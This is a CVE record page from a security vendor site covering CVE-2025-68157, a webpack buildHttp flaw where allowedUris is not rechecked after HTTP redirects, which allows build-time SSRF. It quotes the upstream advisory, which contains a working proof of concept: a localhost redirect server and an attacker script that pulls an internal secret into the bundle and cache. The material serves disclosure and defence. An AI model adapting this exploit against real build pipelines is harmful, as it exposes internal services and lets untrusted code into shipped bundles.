HOL LogoGuard

Explore HOL

  • HOL home
  • AI agent registry
  • AI plugins
  • Open standards
  • HOL members

Guard product

  • Guard overviewLocal security and control for AI agents and the tools they use.
  • FeaturesRuntime protection, policy routing, review, and evidence.

Explore Guard

  • Product previewWalk through Guard surfaces in read-only demo mode.
  • ComparisonCompare Guard with native controls and AI security vendors.

AI tools

  • All AI toolsEvery supported AI tool and how Guard applies policy to it.
  • Codex
  • Claude Code
  • Cursor
  • Antigravity CLI
  • OpenCode
  • Hermes
  • OpenClaw
  • GitHub Copilot CLI
  • Antigravity
  • Kimi
  • Grok
  • Pi / Oh My Pi
  • Zcode

Extensions

  • All extensionsBrowse command and MCP coverage with owners and stated limits.
  • Command coverageShell command protection across clouds, databases, backups, and packages.
  • MCP server coverageSee how Guard maps risk state across MCP tools and servers.
  • Core safetyThe safety floor listings that ship with Guard.
  • Data and resilienceBackup and storage command protection.
  • Cloud and infrastructureAWS, Azure, GCP, Kubernetes, and more.

Security

  • AI security hubSecurity research, advisories, and agent safety coverage.
  • AI tool securitySecurity profiles for each supported coding agent.
  • Safe labsHands-on attack simulations with safe boundaries.
  • Redacted warningsReal blocked actions with sensitive details removed.
  • AdvisoriesCoordinated disclosure reports for AI tooling.
  • Active CVEsSearch active CVEs affecting AI tooling.

Learn

  • Security guidesPractical guides for securing AI agent workflows.
  • DocsInstall, configure, and operate Guard with confidence.
  • ResearchPublished security research, benchmarks, and methodology.

Community

  • ReleasesVersion history, shipped changes and upgrade notes.
  • ContributorsThe people and contributions behind HOL Guard.
  • AffiliatesShare Guard with your audience and earn from referrals.
  • SponsorKeep agent security open: sponsor a project, place a banner, or fund a security initiative.
PricingEnterpriseOpen AppInstall Guard
  1. Guard
  2. Security
  3. CVEs
  4. CVE 2025 68157 buildhttp httpuriplugin alloweduris bypass via
HOL Guard

Public security guidance for teams protecting AI harnesses, MCP servers, skills, prompts, and local tool execution.

Install Guard

AI Security

  • Prompt injection
  • MCP security
  • OWASP MCP mapping
  • Supply chain

Resources

  • Trust packet
  • Harness setup
  • Redacted warnings
  • Safe labs

Product

  • Install Guard
  • Pricing
  • Open dashboard
Guard
  • Guard Overview
  • Releases
  • Contributors
  • Install Guard
  • Pricing
Docs
  • Documentation Index
  • Developer Hub
  • API Reference
  • Root OpenAPI
  • Registry OpenAPI
  • Run in Postman
  • Standards
  • Submit ERC-8004 Contract
  • Feature Your Agent
Best Plugins
  • Browse Plugins
  • Plugin Launches
  • Best Claude Plugins
  • Best Codex Plugins
  • Best Grok Plugins
  • Best Kimi Plugins
  • Best DeepSeek Plugins
  • Best Antigravity Plugins
  • Best MCP Servers
  • Best Cursor Plugins
  • Best OpenCode Plugins
Best Agents
  • Best ERC-8004 Agents
  • Best Virtuals Agents
  • Best MCP Servers
  • Best A2A Agents
  • Best x402 Payable
  • All Categories
Community
  • Telegram
  • X
More
  • About HOL
  • Contact
  • Blog
  • GitHub
  • Privacy
  • Terms of Service
Settings

Copyright © 2026 HOL DAO LLC. All rights reserved.

Back to active CVEs
Low severityCVE-2025-68157GHSA-38R7-794H-5758

buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistenceCVE-2025-68157

Answer in brief

CVE-2025-68157 records a Low severity vulnerability in buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence. The current sources do not mark it as known exploited. The current feed maps webpack (npm). Check affected ranges and fixed versions before updating.

Analysis pending evidence review

HOL Guard separates source facts from reviewed analysis. See the methodology.

Published Feb 5, 2026Updated Feb 5, 2026Source checked Oct 10, 2026First seen by HOL Aug 25, 2026Material review Feb 5, 2026
Upstream Advisory

Key facts

Risk
Low
Exploitation
Not marked as known exploited
Affected software
1 mapped package or product
Fix availability
Not reported

Why this deserves its current priority

A CVSS score is not reported in the current record. The current sources do not mark it as known exploited. Treat this as a source-backed prioritization signal, not a statement about your environment.

Analysis status

Analysis pending evidence review

Factual feed record only; HOL analysis is not approved for indexing. Read the methodology.

Affected scope and exposure questions

The current feed maps webpack (npm). Check affected ranges and fixed versions before updating.

Mapped affected packages and fixed versions
PackageAffected rangeFixed version
webpacknpm>=5.49.0<5.104.0Not reported

Recommended response

  1. 1Check inventory. Check lockfiles and deployed manifests for webpack.
  2. 2Review the reported fix. Monitor this advisory for an available fix and review any installs of the affected package.

Evidence timeline and material changes

  1. Published upstream

    Feb 5, 2026

    Evidence: source:ghsa:source_dates:source-dates:record
  2. Source modified

    Feb 5, 2026

    Evidence: source:ghsa:source_dates:source-dates:record
  3. First seen by HOL

    Aug 25, 2026

Sources and claim methodology

  • GitHub security advisorygithub.com
Upstream source description

### Summary When `experiments.buildHttp` is enabled, webpack’s HTTP(S) resolver (`HttpUriPlugin`) enforces `allowedUris` only for the **initial** URL, but **does not re-validate `allowedUris` after following HTTP 30x redirects**. As a result, an import that appears restricted to a trusted allow-list can be redirected to **HTTP(S) URLs outside the allow-list**. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (requests from the build machine to internal-only endpoints, depending on network access) and **untrusted content inclusion in build outputs** (redirected content is treated as module source and bundled). In my reproduction, the internal response is also persisted in the buildHttp cache. ### Details In the HTTP scheme resolver, the allow-list check (`allowedUris`) is performed when metadata/info is created for the original request (via `getInfo()`), but the content-fetch path follows redirects by resolving the `Location` URL without re-checking whether the redirected URL is within `allowedUris`. Practical consequence: if an “allowed” host/path can return a 302 (or has an open redirect), it can point to an external URL or an internal-only URL (SSRF). The redirected response is consumed as module content, bundled, and can be cached. If the redirect target is attacker-controlled, this can potentially result in attacker-controlled JavaScript being bundled and later executed when the resulting bundle runs. **Figure 1 (evidence screenshot):** left pane shows the allowed host issuing a 302 redirect to `http://127.0.0.1:9100/secret.js`; right pane shows the build output confirming allow-list bypass and that the secret appears in the bundle and buildHttp cache. <img width="1648" height="461" alt="image" src="https://github.com/user-attachments/assets/bb25f3ff-1919-49f9-951b-ad50bf0c7524" /> ### PoC This PoC is intentionally constrained to **127.0.0.1** (localhost-only “internal service”) to demonstrate SSRF behavior safely. #### 1) Setup ```bash mkdir split-ssrf-poc && cd split-ssrf-poc npm init -y npm i -D webpack webpack-cli ``` #### 2) Create server.js ```js #!/usr/bin/env node "use strict"; const http = require("http"); const url = require("url"); const allowedPort = 9000; const internalPort = 9100; const internalUrlDefault = `http://127.0.0.1:${internalPort}/secret.js`; const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`; const internalPayload = `export const secret = ${JSON.stringify(secret)};\n` + `export default "ok";\n`; function start(port, handler) { return new Promise(resolve => { const s = http.createServer(handler); s.listen(port, "127.0.0.1", () => resolve(s)); }); } (async () => { // Internal-only service (SSRF target) await start(internalPort, (req, res) => { if (req.url === "/secret.js") { res.statusCode = 200; res.setHeader("Content-Type", "application/javascript; charset=utf-8"); res.end(internalPayload); console.log(`[internal] 200 /secret.js served (secret=${secret})`); return; } res.statusCode = 404; res.end("not found"); }); // Allowed host (redirector) await start(allowedPort, (req, res) => { const parsed = url.parse(req.url, true); if (parsed.pathname === "/redirect.js") { const to = parsed.query.to || internalUrlDefault; // Safety guard: only allow redirecting to localhost internal service in this PoC if (!to.startsWith(`http://127.0.0.1:${internalPort}/`)) { res.statusCode = 400; res.end("to must be internal-only in this PoC"); console.log(`[allowed] blocked redirect to: ${to}`); return; } res.statusCode = 302; res.setHeader("Location", to); res.end("redirecting"); console.log(`[allowed] 302 /redirect.js -> ${to}`); return; } res.statusCode = 404; res.end("not found"); }); console.log(`\nServer running:`); console.log(`- allowed host: http://127.0.0.1:${allowedPort}/redirect.js`); console.log(`- internal-only: http://127.0.0.1:${internalPort}/secret.js`); })(); ``` #### 3) Create attacker.js ```js #!/usr/bin/env node "use strict"; const path = require("path"); const os = require("os"); const fs = require("fs/promises"); const webpack = require("webpack"); const webpackPkg = require("webpack/package.json"); const allowedPort = 9000; const internalPort = 9100; const allowedBase = `http://127.0.0.1:${allowedPort}/`; const internalTarget = `http://127.0.0.1:${internalPort}/secret.js`; const entryUrl = `${allowedBase}redirect.js?to=${encodeURIComponent(internalTarget)}`; async function walk(dir) { const out = []; const items = await fs.readdir(dir, { withFileTypes: true }); for (const it of items) { const p = path.join(dir, it.name); if (it.isDirectory()) out.push(...await walk(p)); else if (it.isFile()) out.push(p); } return out; } async function fileContains(f, needle) { try { const buf = await fs.readFile(f); return buf.toString("utf8").includes(needle) || buf.toString("latin1").includes(needle); } catch { return false; } } async function findInFiles(files, needle) { const hits = []; for (const f of files) if (await fileContains(f, needle)) hits.push(f); return hits; } const fmtBool = b => (b ? "✅" : "❌"); (async () => { const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-attacker-")); const srcDir = path.join(tmp, "src"); const distDir = path.join(tmp, "dist"); const cacheDir = path.join(tmp, ".buildHttp-cache"); const lockfile = path.join(tmp, "webpack.lock"); const bundlePath = path.join(distDir, "bundle.js"); await fs.mkdir(srcDir, { recursive: true }); await fs.mkdir(distDir, { recursive: true }); await fs.writeFile( path.join(srcDir, "index.js"), `import { secret } from ${JSON.stringify(entryUrl)}; console.log("LEAKED_SECRET:", secret); export default secret; ` ); const config = { context: tmp, mode: "development", entry: "./src/index.js", output: { path: distDir, filename: "bundle.js" }, experiments: { buildHttp: { allowedUris: [allowedBase], cacheLocation: cacheDir, lockfileLocation: lockfile, upgrade: true } } }; const compiler = webpack(config); compiler.run(async (err, stats) => { try { if (err) throw err; const info = stats.toJson({ all: false, errors: true, warnings: true }); if (stats.hasErrors()) { console.error(info.errors); process.exitCode = 1; return; } const bundle = await fs.readFile(bundlePath, "utf8"); const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i); const secret = m ? m[0] : null; console.log("\n[ATTACKER RESULT]"); console.log(`- webpack version: ${webpackPkg.version}`); console.log(`- node version: ${process.version}`); console.log(`- allowedUris: ${JSON.stringify([allowedBase])}`); console.log(`- imported URL (allowed only): ${entryUrl}`); console.log(`- temp dir: ${tmp}`); console.log(`- lockfile: ${lockfile}`); console.log(`- cacheDir: ${cacheDir}`); console.log(`- bundle: ${bundlePath}`); if (!secret) { console.log("\n[SECURITY SUMMARY]"); console.log(`- bundle contains internal secret marker: ${fmtBool(false)}`); return; } const lockHit = await fileContains(lockfile, secret); let cacheFiles = []; try { cacheFiles = await walk(cacheDir); } catch { cacheFiles = []; } const cacheHit = cacheFiles.length ? (await findInFiles(cacheFiles, secret)).length > 0 : false; const allTmpFiles = await walk(tmp); const allHits = await findInFiles(allTmpFiles, secret); console.log(`\n- extracted secret marker from bundle: ${secret}`); console.log("\n[SECURITY SUMMARY]"); console.log(`- Redirect allow-list bypass: ${fmtBool(true)} (imported allowed URL, but internal target was fetched)`); console.log(`- Internal target (SSRF-like): ${internalTarget}`); console.log(`- EXPECTED: internal target should be BLOCKED by allowedUris`); console.log(`- ACTUAL: internal content treated as module and bundled`); console.log("\n[EVIDENCE CHECKLIST]"); console.log(`- bundle contains secret: ${fmtBool(true)}`); console.log(`- cache contains secret: ${fmtBool(cacheHit)}`); console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`); console.log("\n[PERSISTENCE CHECK] files containing secret"); for (const f of allHits.slice(0, 30)) console.log(`- ${f}`); if (allHits.length > 30) console.log(`- ... and ${allHits.length - 30} more`); } catch (e) { console.error(e); process.exitCode = 1; } finally { compiler.close(() => {}); } }); })(); ``` #### 4) Run Terminal A: ```bash node server.js ``` Terminal B: ```bash node attacker.js ``` #### 5) Expected Expected: Redirect target should be rejected if not in allowedUris (only http://127.0.0.1:9000/ is allowed). ### Impact Vulnerability class: Policy/allow-list bypass leading to SSRF behavior at build time and untrusted content inclusion in build outputs (and potentially bundling of attacker-controlled JavaScript if the redirect target is attacker-controlled). Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary (to restrict remote module fetching). In such environments, an attacker who can influence imported URLs (e.g., via source contribution, dependency manipulation, or configuration) and can cause an allowed endpoint to redirect can: trigger network requests from the build machine to internal-only services (SSRF behavior), cause content from outside the allow-list to be bundled into build outputs, and cause fetched responses to persist in build artifacts (e.g., buildHttp cache), increasing the risk of later exfiltration.

Quoted source text, attributed separately from HOL analysis.

Record context

Vulnerability class
SSRF
EPSS
Not reported
CWE IDs
Not reported
Source
GitHub Security Advisories
Source checked
Oct 10, 2026
References
1 linked source
Open source record